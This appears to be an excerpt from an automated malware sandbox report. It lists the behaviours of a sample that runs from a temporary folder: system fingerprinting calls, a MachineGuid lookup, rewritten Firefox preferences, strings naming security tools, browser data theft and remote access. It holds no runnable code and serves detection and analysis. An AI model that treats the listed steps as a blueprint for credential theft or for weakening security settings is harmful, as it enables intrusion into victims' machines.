Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Desktop\MXPXCVPDVN VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E171545C GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,

0_2_00007FF6E171545C

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC074B0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe

Code function: 8_2_00007FF632DC518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

8_2_00007FF632DC518C

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC074B0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Overwrites Mozilla Firefox settings

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior

AV process strings found (often used to terminate AV products)

Source: svchost.exe

Binary or memory string: procexp.exe

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

Source: C:\Windows\System32\svchost.exe

File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js

Remote Access Functionality